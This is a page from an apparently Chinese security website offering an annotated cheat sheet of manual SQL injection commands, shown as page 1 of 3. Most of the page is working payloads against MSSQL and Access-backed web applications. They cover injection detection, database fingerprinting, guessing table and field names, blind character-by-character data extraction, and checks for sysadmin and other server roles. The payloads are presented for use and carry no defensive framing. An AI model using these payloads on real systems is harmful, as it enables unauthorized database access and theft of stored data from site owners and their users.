[推荐]带注释手动注入脚本命令小结

整理了下手动注入脚本命令[带注释]

1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字符’and [查询条件] and ’’=’

4.搜索时没过滤参数的’and [查询条件] and ’%25’=’

5.判断数据库系统

;and （select count（*） from sysobjects）>0 mssql

;and （select count（*） from msysobjects）>0 access

6.猜数据库 ;and （select Count（*） from [数据库名]）>0

7.猜字段 ;and （select Count（字段名） from 数据库名）>0

8.猜字段中记录长度 ;and （select top 1 len（字段名） from 数据库名）>0

9.（1）猜字段的ascii值（access）

;and （select top 1 asc（mid（字段名,1,1）） from 数据库名）>0

（2）猜字段的ascii值（mssql）

;and （select top 1 unicode（substring（字段名,1,1）） from 数据库名）>0

10.测试权限结构（mssql）

;and 1=（select IS_SRVROLEMEMBER（’sysadmin’））;--

;and 1=（select IS_SRVROLEMEMBER（’serveradmin’））;--

;and 1=（select IS_SRVROLEMEMBER（’setupadmin’））;--

;and 1=（select IS_SRVROLEMEMBER（’securityadmin’））;--

;and 1=（select IS_SRVROLEMEMBER（’diskadmin’））;--

;and 1=（select IS_SRVROLEMEMBER（’bulkadmin’））;--

;and 1=（select IS_MEMBER（’db_owner’））;--

【内容导航】
第1页：[推荐]带注释手动注入脚本命令小结	第2页：[推荐]带注释手动注入脚本命令小结
第3页：[推荐]带注释手动注入脚本命令小结

Solaris UNIX操作系统IP拒绝服务漏洞Virut病毒通过加密变形来躲避特征码检查相关资讯网络安全注入脚本

网络安全的火眼金睛（02/03/2015 16:42:46）
使用网络小命令检测PC是否安全（12/23/2007 10:00:38）
裸奔上网很危险请养成网络安全意（06/01/2007 06:52:19）

ubuntu下两个网络安全扫描工具（01/05/2008 12:46:35）
暑假安全上网教您轻松封杀无良网（07/02/2007 06:25:51）
做好无线网络安全保卫在空气中传（05/26/2007 08:27:46）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规